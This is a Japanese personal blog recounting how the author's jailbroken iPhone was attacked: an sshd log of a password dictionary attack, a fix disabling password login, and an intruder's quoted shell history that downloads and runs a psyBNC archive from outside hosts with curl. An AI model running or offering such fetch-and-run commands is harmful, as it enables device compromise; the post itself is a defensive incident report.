NokiaのE90に関連した備忘録です。いつまで続くかな?
上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。
-----追記ここから-----
【2010/05/23】 以下の記事をアップしました。

iPhoneの脱獄について

本当に脱獄が必要なのか良く考えた上で自己責任で実行してください。
-----追記ここまで-----

この前のことがあってからsyslogを取るようにしたら結構攻撃を受けているようです。
最近電池の減りが早いのでおかしいと思っていたのですがこれで納得です。

攻撃してきたアドレスはさらしておきます。

Jan 19 04:43:53 XXXXXXXX launchproxy[2994]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 48948
Jan 19 04:43:53 XXXXXXXX sshd[2995]: Did not receive identification string from 210.219.122.3
Jan 19 04:48:22 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 58562
Jan 19 04:48:25 XXXXXXXX sshd[3025]: Failed password for root from 210.219.122.3 port 58562 ssh2
Jan 19 04:48:25 XXXXXXXX sshd[3025]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:25 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 58717
Jan 19 04:48:27 XXXXXXXX sshd[3026]: Invalid user fluffy from 210.219.122.3
Jan 19 04:48:27 XXXXXXXX sshd[3026]: input_userauth_request: invalid user fluffy
Jan 19 04:48:27 XXXXXXXX sshd[3026]: Failed password for invalid user fluffy from 210.219.122.3 port 58717 ssh2
Jan 19 04:48:27 XXXXXXXX sshd[3026]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:27 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 58810
Jan 19 04:48:29 XXXXXXXX sshd[3027]: Invalid user admin from 210.219.122.3
Jan 19 04:48:29 XXXXXXXX sshd[3027]: input_userauth_request: invalid user admin
Jan 19 04:48:29 XXXXXXXX sshd[3027]: Failed password for invalid user admin from 210.219.122.3 port 58810 ssh2
Jan 19 04:48:29 XXXXXXXX sshd[3027]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:29 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 58915
Jan 19 04:48:30 XXXXXXXX sshd[3028]: Invalid user test from 210.219.122.3
Jan 19 04:48:30 XXXXXXXX sshd[3028]: input_userauth_request: invalid user test
Jan 19 04:48:30 XXXXXXXX sshd[3028]: Failed password for invalid user test from 210.219.122.3 port 58915 ssh2
Jan 19 04:48:31 XXXXXXXX sshd[3028]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:31 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 59027
Jan 19 04:48:32 XXXXXXXX sshd[3029]: Invalid user guest from 210.219.122.3
Jan 19 04:48:32 XXXXXXXX sshd[3029]: input_userauth_request: invalid user guest
Jan 19 04:48:32 XXXXXXXX sshd[3029]: Failed password for invalid user guest from 210.219.122.3 port 59027 ssh2
Jan 19 04:48:32 XXXXXXXX sshd[3029]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:32 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 59141
Jan 19 04:48:34 XXXXXXXX sshd[3030]: Invalid user webmaster from 210.219.122.3
Jan 19 04:48:34 XXXXXXXX sshd[3030]: input_userauth_request: invalid user webmaster
Jan 19 04:48:34 XXXXXXXX sshd[3030]: Failed password for invalid user webmaster from 210.219.122.3 port 59141 ssh2
Jan 19 04:48:34 XXXXXXXX sshd[3030]: Received disconnect from 210.219.122.3: 11: Bye Bye
Jan 19 04:48:34 XXXXXXXX launchproxy[3024]: /usr/libexec/sshd-keygen-wrapper: Connection from: 210.219.122.3 on port: 60063
Jan 19 04:48:36 XXXXXXXX sshd[3031]: Invalid user mysql from 210.219.122.3
Jan 19 04:48:36 XXXXXXXX sshd[3031]: input_userauth_request: invalid user mysql
Jan 19 04:48:36 XXXXXXXX sshd[3031]: Failed password for invalid user mysql from 210.219.122.3 port 60063 ssh2
Jan 19 04:48:36 XXXXXXXX sshd[3031]: Received disconnect from 210.219.122.3: 11: Bye Bye


パスワードはalpineから変更しておいたのですが、辞書攻撃でやられたようです。
よく使われるパスワードTOP500とかに載っていないので安心していましたがちょっと甘かったようで、googleでパスワードを検索するとそれなりに出てきちゃいました。(^^ゞ

2.1の時にはsshの設定を変更してパスワードではなくキーファイルでのアクセスのみ許可する設定にしておいたのですが2.2に上げた時に設定するのを忘れたようです。

変更箇所は

/etc/ssh/sshd_config



#PasswordAuthentication yes

をコメントアウトしてnoにしておきます。

PasswordAuthentication no

これでパスワードによるログインが出来なくなりますので安心です。

もうしばらくはsyslogで確認しておいた方が良さそうです。
スポンサーサイト
-----追記ここから-----
【2010/05/23】 以下の記事をアップしました。

iPhoneの脱獄について

本当に脱獄が必要なのか良く考えた上で自己責任で実行してください。
-----追記ここまで-----

昨日Calendarのデータをいじろうと久しぶりにiPhoneにログインしたところ/var/rootの下に .a なるディレクトリーが作成されていました。
.で始まるファイル名なのでlsコマンドでも-aを付けないと表示されないのですが、普段から-laを付けているので見つけることが出来ました。

で、ディレクトリーの中を見るとpsydarwin.tgzと言うファイルとそれを展開した物が入っていました。
こんなディレクトリーを作った覚えも全くないのでおかしいと思い.bash_historyを見てみるとこんなコマンドが実行されていました。

uname -a
cat /etc/hosts
w
uptime
ps -x
mkdir .a
cd .a
curl -O http://trades.at.ua/psybnc-darwin.tgz
wget
curl
curl -O http://Linux-Help.clan.su/download/PsyBncDRWN.tgz
yum istall wget
tar zxvf psydarwin.tgz
cd psybnc
chmod +x *
sh
./psybnc
./psybnc
ls
./psybnc
chmod +x *
./psybnc


mkdir .a が実行されているのでディレクトリーのタイムスタンプを見ると12/31の23:59となっており、この時間はTVを見ていたのでiPhoneには指一本触れていませんでした。

curlなど普段は全く使わないというか、使ったことが一度もないコマンドなので誰かに触られたとしか考えられません。
rootのパスワードは変更してあるし、誰がどうやって侵入したのか全くの謎です。

これら一連のコマンドの後は見覚えのあるコマンドなので、途中であきらめたのでしょう。
実行しようとしたバイナリーはARM用にコンパイルされた物ではなかったので助かりました。

それにしても年明け早々???な出来事でした。
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。